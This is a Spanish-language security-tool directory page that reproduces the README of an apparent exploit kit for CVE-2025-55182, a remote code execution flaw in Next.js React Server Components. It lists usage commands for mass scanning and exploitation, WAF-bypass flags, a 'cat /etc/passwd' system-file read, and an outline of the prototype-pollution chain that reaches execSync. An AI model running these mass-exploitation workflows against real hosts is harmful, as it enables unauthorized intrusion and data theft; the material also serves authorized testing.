Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-55182-NextJS-Scanner-React2Shell-PoC | Kitploit
Herramientas/GitHubGitHub/exrienz/cve-2025-55182-nextjs-scanner-react2shell-poc
ReconocimientoEscáneres de VulnerabilidadesGeneración de PayloadsExplotaciónExplotación de Aplicaciones WebEvasión de WAFPruebas de PenetraciónComando y Control

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
GitHub
exrienz/cve-2025-55182-nextjs-scanner-react2shell-poc

CVE-2025-55182-NextJS-Scanner-React2Shell-PoC

Ver Repositorio
hace 8 mesesAún no revisado
Compartir

Herramienta de Explotación CVE-2025-55182

Una herramienta integral de investigación de seguridad para probar la vulnerabilidad de ejecución remota de código (RCE) en React Server Components de Next.js (CVE-2025-55182).

Descripción general

Este kit proporciona capacidades automatizadas de detección y explotación para CVE-2025-55182, una vulnerabilidad crítica de RCE que afecta a las aplicaciones Next.js que utilizan React Server Components. El kit consta de tres componentes integrados:

  • NextApp.py - Escáner inteligente de fingerprinting de aplicaciones Next.js
  • exploit.sh - Herramienta de explotación flexible para objetivos individuales o masivos
  • auto_exploit.sh - Orquestador automatizado de escaneo y explotación de extremo a extremo

Características

  • Detección multicapa: Análisis de cabeceras, escaneo del cuerpo y fingerprinting de JavaScript
  • Puntuación de confianza: Clasificación inteligente (Alta/Media/Baja) para minimizar falsos positivos
  • Bypass de WAF: Técnicas integradas para evadir cortafuegos de aplicaciones web comunes
  • Escaneo masivo: Procesa múltiples objetivos de forma eficiente con informes detallados
  • Flujo de trabajo automatizado: Detección y explotación con un solo comando
  • Informes detallados: Archivos de salida completos con resultados categorizados

Requisitos

Componentes de Python

  • Python 3.x
  • Librería requests
root@kitploit:~
pip3 install requests

Componentes Bash

  • curl
  • openssl
  • Utilidades estándar de Unix (sed, grep, awk, mktemp)

Instalación

root@kitploit:~
git clone https://github.com/yourusername/CVE-2025-55182-poc-tool.git
cd CVE-2025-55182-poc-tool
chmod +x exploit.sh auto_exploit.sh

Uso

Inicio rápido (recomendado)

La forma más rápida de escanear y explotar objetivos:

root@kitploit:~
# Create a file with target URLs (one per line)
echo "https://example.com" > targets.txt

# Auto-scan and exploit in one command
./auto_exploit.sh -i targets.txt -s -c "id"

Solo detección

Identifica aplicaciones Next.js sin explotación:

root@kitploit:~
python3 NextApp.py targets.txt

Archivos de salida:

  • confirmed_nextjs_targets.txt - Todas las aplicaciones Next.js detectadas
  • high_confidence_nextjs_targets.txt - Solo detecciones de alta confianza

Explotación de un solo objetivo

Prueba objetivos individuales:

root@kitploit:~
# Basic exploitation
./exploit.sh -d https://target.com -c "whoami"

# With WAF bypass
./exploit.sh -d target.com -c "cat /etc/passwd" -w

# Custom WAF bypass size
./exploit.sh -d target.com -c "ls -la" --waf-bypass --waf-size 256

# Skip SSL verification
./exploit.sh -d https://target.com -c "id" -k

Explotación masiva

Opción 1: Flujo de trabajo unificado (recomendado)

root@kitploit:~
./auto_exploit.sh -i targets.txt -s -c "whoami"

Opción 2: Flujo de trabajo manual en dos pasos

root@kitploit:~
# Step 1: Detect Next.js applications
python3 NextApp.py targets.txt

# Step 2: Exploit confirmed targets
./auto_exploit.sh -c "id"

Opciones avanzadas

root@kitploit:~
# Full auto-scan with WAF bypass
./auto_exploit.sh -i targets.txt -s -w --waf-size 256 -c "whoami"

# Custom delays and timeouts
./auto_exploit.sh -i targets.txt -s --delay 5 --timeout 30 -c "id"

# Skip SSL verification in bulk mode
./auto_exploit.sh -i targets.txt -s -k -c "hostname"

Referencia de comandos

NextApp.py

root@kitploit:~
python3 NextApp.py <targets_file>

Argumentos:

  • targets_file - Archivo de texto que contiene las URL de los objetivos (una por línea)

exploit.sh

root@kitploit:~
./exploit.sh [OPTIONS]

Opciones:

auto_exploit.sh

root@kitploit:~
./auto_exploit.sh [OPTIONS]

Opciones:

Archivos de salida

confirmed_nextjs_targets.txt

Generado por NextApp.py - contiene todas las URL identificadas como aplicaciones Next.js.

high_confidence_nextjs_targets.txt

Generado por NextApp.py - contiene solo detecciones Next.js de alta confianza (puntuación de confianza superior a 100).

exploit_results.txt

Generado por auto_exploit.sh - informe de explotación completo que incluye:

  • Objetivos vulnerables con salida del comando
  • Objetivos no vulnerables
  • Errores y sus detalles
  • Estadísticas resumidas

Metodología de detección

El escáner utiliza múltiples técnicas de detección con un sistema de puntuación de confianza:

Análisis de cabeceras (50 puntos cada una)

  • Cabeceras específicas de Next.js: x-nextjs-*, x-vercel-*
  • x-powered-by: Next.js
  • Server: Vercel

Escaneo del cuerpo

  • Presencia de __NEXT_DATA__ (100 puntos)
  • Patrón buildId de Next.js (50 puntos)
  • Rutas de recursos _next/* (25-75 puntos según la cantidad)

Fingerprinting de JavaScript (60 puntos)

  • __NEXT_DATA__, __NEXT_LOADED_PAGES__
  • middlewareManifest, self.__RSC_MANIFEST

Umbrales de confianza:

  • Alta (100+): Múltiples indicadores sólidos
  • Media (75-99): Varios indicadores moderados
  • Baja (50-74): Evidencia mínima
  • Por debajo de 50: Rechazada como falso positivo

Mecanismo de explotación

El exploit aprovecha una cadena de contaminación de prototipos (prototype pollution) en React Server Components de Next.js:

  1. Construye datos de formulario multipart con carga útil anidada
  2. Contamina la cadena __proto__ mediante deserialización JSON
  3. Inyecta JavaScript arbitrario en _response._prefix
  4. Ejecuta comandos mediante process.mainModule.require('child_process').execSync()
  5. Extrae los resultados de la cabecera X-Action-Redirect
  6. Decodifica la URL y formatea la salida

Técnicas de bypass de WAF

El kit incluye capacidades integradas de bypass de WAF:

  • Inyección de datos basura: Antepone datos aleatorios para evadir filtros basados en tamaño
  • Límites dinámicos: Límites multipart aleatorizados
  • Aleatorización del ID de solicitud: IDs únicos por solicitud
  • Tamaño configurable: Tamaño de datos basura ajustable (128KB por defecto)

Actívalo con las banderas -w o --waf-bypass.

Ejemplos

Escanear y explotar aplicaciones web

root@kitploit:~
# Create target list
cat > targets.txt << EOF
https://app.example.com
https://dashboard.example.com
https://admin.example.com
EOF

# Run unified scan
./auto_exploit.sh -i targets.txt -s -c "whoami"

# Check results
cat exploit_results.txt

Probar un solo objetivo con bypass de WAF

root@kitploit:~
./exploit.sh -d https://target.com -c "cat /etc/passwd" -w --waf-size 256

Solo objetivos de alta confianza

root@kitploit:~
# Step 1: Detect and filter
python3 NextApp.py targets.txt

# Step 2: Exploit high-confidence only
./auto_exploit.sh -i high_confidence_nextjs_targets.txt -c "id"

Aviso legal

Esta herramienta está destinada únicamente a fines de investigación y pruebas de seguridad autorizadas. Los usuarios deben:

  • ✅ Obtener permiso explícito por escrito antes de probar cualquier sistema
  • ✅ Utilizarla solo en compromisos de pruebas de penetración autorizados
  • ✅ Cumplir con todas las leyes y regulaciones aplicables
  • ✅ Utilizarla para investigación de seguridad defensiva y competiciones CTF

El acceso no autorizado a sistemas informáticos es ilegal. Los autores no asumen ninguna responsabilidad por el mal uso de esta herramienta.

Información de la vulnerabilidad

  • ID de CVE: CVE-2025-55182
  • Afectado: React Server Components de Next.js
  • Tipo: Ejecución remota de código (RCE)
  • Gravedad: Crítica

Créditos

Gracias a los investigadores de seguridad que descubrieron y divulgaron esta vulnerabilidad:

  • @zack0x01
  • @infosec_au
  • @pdiscoveryio

Contribuciones

¡Las contribuciones son bienvenidas! Por favor:

  1. Haz un fork del repositorio
  2. Crea una rama de funcionalidad
  3. Haz commit de tus cambios
  4. Envía un pull request

Soporte

Para problemas, preguntas o solicitudes de funciones, abre un issue en GitHub.

Licencia

Este proyecto se proporciona con fines educativos y de pruebas de seguridad autorizadas. Úsalo de forma responsable y ética.

Descargar herramienta
OptionDescriptionDefault
-d, --domainDominio/URL objetivohttp://localhost:3000
-f, --fileArchivo con la lista de objetivos-
-c, --commandComando a ejecutarid
-w, --waf-bypassHabilitar bypass de WAFDeshabilitado
--waf-size SIZETamaño de datos del bypass de WAF (KB)128
--timeout SECONDSTiempo de espera de la solicitud15
-k, --insecureOmitir verificación SSLDeshabilitado
--user-agent AGENTUser-Agent personalizadoMozilla/5.0...
-h, --helpMostrar mensaje de ayuda-
OptionDescriptionDefault
-i, --input FILEArchivo de entrada de objetivosconfirmed_nextjs_targets.txt
-o, --output FILEArchivo de salida de resultadosexploit_results.txt
-c, --command CMDComando a ejecutarid
-w, --waf-bypassHabilitar bypass de WAFDeshabilitado
--waf-size SIZETamaño del bypass de WAF (KB)128
--timeout SECONDSTiempo de espera de la solicitud15
-k, --insecureOmitir verificación SSLDeshabilitado
--delay SECONDSRetardo entre solicitudes2
-s, --scanEscanear automáticamente Next.js primeroDeshabilitado
-h, --helpMostrar mensaje de ayuda-